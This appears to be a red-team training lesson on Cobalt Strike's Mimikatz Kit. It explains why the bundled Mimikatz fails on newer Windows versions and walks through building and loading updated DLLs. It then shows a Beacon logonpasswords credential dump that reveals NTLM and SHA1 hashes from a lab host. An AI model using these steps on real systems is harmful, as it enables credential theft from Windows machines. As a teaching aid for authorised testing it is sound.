Mimikatz Kit

You may have noticed instances in the lab where you've tried to run commands such as sekurlsa::logonpasswords and sekurlsa::ekeys, only to receive the following error:

beacon> run hostname
web

beacon> getuid
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

This is simply because the version of Mimikatz built into Cobalt Strike by default is not recent enough to work on later versions of Windows such as 11 and Server 2022. The Mimikatz Kit allows you to bring alternate builds of Mimikatz into CS to overcome this limitation.

Confusingly, CS is actually bundled with multiple flavours of Mimikatz in both x86 and x64 builds.

PS C:\Tools\cobaltstrike\arsenal-kit\kits\mimikatz> ls

    Directory: C:\Tools\cobaltstrike\arsenal-kit\kits\mimikatz

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        05/12/2022     16:57           1046 build.sh
-a----        05/12/2022     16:57         773120 mimikatz-chrome.x64.dll
-a----        05/12/2022     16:57         638464 mimikatz-chrome.x86.dll
-a----        05/12/2022     16:57         813568 mimikatz-full.x64.dll
-a----        05/12/2022     16:57         704000 mimikatz-full.x86.dll
-a----        05/12/2022     16:57        1421824 mimikatz-max.x64.dll
-a----        05/12/2022     16:57        1192960 mimikatz-max.x86.dll
-a----        05/12/2022     16:57         312832 mimikatz-min.x64.dll
-a----        05/12/2022     16:57         276480 mimikatz-min.x86.dll
-a----        05/12/2022     16:57           2661 README.md
-a----        05/12/2022     16:57           1007 script_template.cna

The DLLs are custom-built to include a Reflective DLL loader (based on Stephen Fewer's original implementation) and modified code to achieve a smaller file size, which is required to work with Beacon's legacy 1 MB size limit.

The "max" versions include the complete Mimikatz codebase and can be used with CS 4.6 and above, where the 1 MB limit can be removed. The "full" versions have some code stripped out to reduce the file size (although no official documentation seems to exist that explains exactly what is removed), and the "chrome" versions contain the code required by Beacon's chromedump command. Again, no documentation seems to exist that states which parts of the Mimikatz codebase this is, but I suspect it's at least dpapi::chrome.

The good news is that the CS dev team are making an effort to keep the version of Mimikatz inside the Mimikatz Kit up-to-date with Benjamin's repo. This means we can simply build the kit as-is and load it into CS. This is as simple as running build.sh and specifying an output directory.

ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> pwd
/mnt/c/Tools/cobaltstrike/arsenal-kit/kits/mimikatz

ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> ./build.sh /mnt/c/Tools/cobaltstrike/mimikatz
[Mimikatz kit] [+] Copying the mimikatz dlls
[Mimikatz kit] [+] Generate the mimikatz.cna from the template file.
[Mimikatz kit] [+] The Mimikatz files are saved in '/mnt/c/Tools/cobaltstrike/mimikatz'

Load mimikatz.cna via the Cobalt Strike > Script Manager menu and click the Load button. After loading the CNA, Mimikatz will function as expected.

beacon> logonpasswords

Authentication Id : 0 ; 64753 (00000000:0000fcf1)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/15/2023 3:03:57 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB$
	 * Domain   : DEV
	 * NTLM     : 4b5aff0a96dfb6c6240340a6800e6f11
	 * SHA1     : bd13b64953a55abddf7b9c1bdcc043a9d88fd955